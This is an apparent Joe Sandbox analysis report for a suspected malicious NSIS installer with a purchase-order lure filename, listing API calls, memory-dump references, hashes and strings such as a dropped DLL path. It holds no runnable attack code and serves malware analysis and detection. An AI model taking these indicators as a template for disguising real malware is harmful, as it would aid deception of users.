                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1912718029-0
                                                                                              • Opcode ID: 1537f09e12a9e60e0b2a8eae30c6507c5457e656f0290ab1b216bb77a8747b60
                                                                                              • Instruction ID: a55e164afb4a2c5db24f06852be026e23ac61ce6859740a963365f2f7f7eec81
                                                                                              • Opcode Fuzzy Hash: 1537f09e12a9e60e0b2a8eae30c6507c5457e656f0290ab1b216bb77a8747b60
                                                                                              • Instruction Fuzzy Hash: 2F116771904119FFEF11AF90DF8CEAE3B79FB54388B10003AF905E10A0D7B49E55AA28
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                              • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                              • String ID:
                                                                                              • API String ID: 1849352358-0
                                                                                              • Opcode ID: 654fe9a3b94fa22656c9e0fad6745143c48d35558dbd85a331d0b39ad963d5af
                                                                                              • Instruction ID: d5b0b812c52730b156692ce296a05b57ce8d9064807eae1c9fc7a35bbe74f0db
                                                                                              • Opcode Fuzzy Hash: 654fe9a3b94fa22656c9e0fad6745143c48d35558dbd85a331d0b39ad963d5af
                                                                                              • Instruction Fuzzy Hash: C7F0E172501504AFD701DBE4DE88CEEBBBDEB48311B10447AF541F51A1CA749D018B28
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401D56 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDC.USER32(?), ref: 00401D59
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                              • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401DD1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                              • String ID:
                                                                                              • API String ID: 3808545654-0
                                                                                              • Opcode ID: bb59d375fd00ea9bf7a16e1c15933f8724b19bfa5ac8ca4f719c71241bcbf4da
                                                                                              • Instruction ID: 1901d7d296450183f5894fa9bbb5198f988e596920eebf68b9e2cfe033e75292
                                                                                              • Opcode Fuzzy Hash: bb59d375fd00ea9bf7a16e1c15933f8724b19bfa5ac8ca4f719c71241bcbf4da
                                                                                              • Instruction Fuzzy Hash: 0A016271984640FFEB01ABB4AF8AB9A3F75AF65301F104579E541F61E2D97800059B2D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040496B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A0C
                                                                                              • wsprintfW.USER32 ref: 00404A15
                                                                                              • SetDlgItemTextW.USER32(?,0042D248), ref: 00404A28
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                              • String ID: %u.%u%s%s
                                                                                              • API String ID: 3540041739-3551169577
                                                                                              • Opcode ID: 224b46551f0518a21af59e08ab662a7d6db9c20c9ea580731f6276641f89a3f9
                                                                                              • Instruction ID: 0b736bf888c47b86caf201b097c22cff5488322ea99b5df57e3066faec5b3164
                                                                                              • Opcode Fuzzy Hash: 224b46551f0518a21af59e08ab662a7d6db9c20c9ea580731f6276641f89a3f9
                                                                                              • Instruction Fuzzy Hash: 9011E773A041283BDB10957D9C41EAF329CAB85334F254237FA25F31D1D978CD2182E9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Timeout
                                                                                              • String ID: !
                                                                                              • API String ID: 1777923405-2657877971
                                                                                              • Opcode ID: d1ce46bd28cc36f50990ff65351f506775fb0047ee6065fba40e47d3ae025a49
                                                                                              • Instruction ID: 7183083e97b306686418f33f328e020de39305092e82b8c4ae23370839422ec4
                                                                                              • Opcode Fuzzy Hash: d1ce46bd28cc36f50990ff65351f506775fb0047ee6065fba40e47d3ae025a49
                                                                                              • Instruction Fuzzy Hash: 48219071940209BEEF01AFB5CE4AABE7B75EB44744F10403EF601B61D1D6B89A40DB68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403B6F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetWindowTextW.USER32(00000000,Podning Setup), ref: 00403C07
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: TextWindow
                                                                                              • String ID: "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe"$1033$Podning Setup
                                                                                              • API String ID: 530164218-470383153
                                                                                              • Opcode ID: 59ce6dc07d6ca67894d75a769e307db226b6569afcabdc78d824c7418b618399
                                                                                              • Instruction ID: 847b53d7ec13df621055667e1e13bb36484023f01c55a5fe093bb98d5154ae24
                                                                                              • Opcode Fuzzy Hash: 59ce6dc07d6ca67894d75a769e307db226b6569afcabdc78d824c7418b618399
                                                                                              • Instruction Fuzzy Hash: 0611F035B046118BC3209F15DC40A737BBDEB8971A328417FE901AB3E1CB3DAD028B98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402537 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WideCharToMultiByte.KERNEL32(?,?,0040B5D0,000000FF,C:\Windows\resources\uncriticizables.dll,00000400,?,?,00000021), ref: 00402583
                                                                                              • lstrlenA.KERNEL32(C:\Windows\resources\uncriticizables.dll,?,?,0040B5D0,000000FF,C:\Windows\resources\uncriticizables.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWidelstrlen
                                                                                              • String ID: C:\Windows\resources\uncriticizables.dll
                                                                                              • API String ID: 3109718747-3127695999
                                                                                              • Opcode ID: b89ab65cbe32a9b0f064df4d6d3eddc4a16b9363d27f126e6304827e28b96444
                                                                                              • Instruction ID: 0e395622636dcde05068836be4baa4a456a4d64089cc24394ac90f0f0b10d43f
                                                                                              • Opcode Fuzzy Hash: b89ab65cbe32a9b0f064df4d6d3eddc4a16b9363d27f126e6304827e28b96444
                                                                                              • Instruction Fuzzy Hash: A511E772A01204BADB10AFB18F4EA9E32659F54354F24403BF502F61C1DAFC9A41966E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405A04 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405A0A
                                                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405A14
                                                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405A26
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A04
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 2659869361-3081826266
                                                                                              • Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                                                              • Instruction ID: e6cb25dffc9e5a2bb3a1dbad45cd46e4450efeecdd43702cab0598af126a0af2
                                                                                              • Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                                                              • Instruction Fuzzy Hash: 06D05E31211534AAC211AB589D05CDB629C9E46304341442AF241B20A1C779595186FE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402D8A Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00402D9D
                                                                                              • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00402DE6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                              • String ID:
                                                                                              • API String ID: 2102729457-0
                                                                                              • Opcode ID: df109012b7806b8de8df2929ec67b86acfc6093236d2d9f47b9f955c0080d778
                                                                                              • Instruction ID: 9565580f91e6c8b036764476f8379a8a9497e0cf8b36b33943f0ae23fa557cda
                                                                                              • Opcode Fuzzy Hash: df109012b7806b8de8df2929ec67b86acfc6093236d2d9f47b9f955c0080d778
                                                                                              • Instruction Fuzzy Hash: FFF05E30501520BBC671AB20FF4DA9B7B64FB40B11701447AF042B15E4C7B80D828B9C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405B0C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Podning Setup,NSIS Error), ref: 0040605D
                                                                                                • Part of subcall function 00405AAF: CharNextW.USER32(?,?,0042FA50,?,00405B23,0042FA50,0042FA50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405ABD
                                                                                                • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405AC2
                                                                                                • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405ADA
                                                                                              • lstrlenW.KERNEL32(0042FA50,00000000,0042FA50,0042FA50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B65
                                                                                              • GetFileAttributesW.KERNEL32(0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,00000000,0042FA50,0042FA50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B75
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B0C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 3248276644-3081826266
                                                                                              • Opcode ID: 1860d25d1cedceeae653fbc66b59fe140c8df0ce2729e3c8c9131a1b177ba99c
                                                                                              • Instruction ID: 63a6569c831ee5581447f3e1e8ec18e6ac74a78ddfb021a14ce772f4501d9fee
                                                                                              • Opcode Fuzzy Hash: 1860d25d1cedceeae653fbc66b59fe140c8df0ce2729e3c8c9131a1b177ba99c
                                                                                              • Instruction Fuzzy Hash: 32F0F435100E1119D62632361C49BAF2664CF82324B4A023FF952B22D1DB3CB993CC7E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405123 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 00405152
                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 004051A3
                                                                                                • Part of subcall function 00404160: SendMessageW.USER32(00010458,00000000,00000000,00000000), ref: 00404172
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                              • String ID:
                                                                                              • API String ID: 3748168415-3916222277
                                                                                              • Opcode ID: 340d3c0ef1b6191d39bf660b6c525c67a0e16f797af015efc8e2bb8f4ca6604a
                                                                                              • Instruction ID: 3a757cf3c9e7612e230a46be1b13aa2d047f9f757cddf2eb8b5381add8f22129
                                                                                              • Opcode Fuzzy Hash: 340d3c0ef1b6191d39bf660b6c525c67a0e16f797af015efc8e2bb8f4ca6604a
                                                                                              • Instruction Fuzzy Hash: 43017C71A00609ABEB218F51ED84B9B3B2AEB84750F504037F6047D1E0C77A8C929E2A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403804 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,004037DC,004035F2,?), ref: 0040381E
                                                                                              • GlobalFree.KERNEL32(?), ref: 00403825
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403804
                                                                                              Memory Dump Source
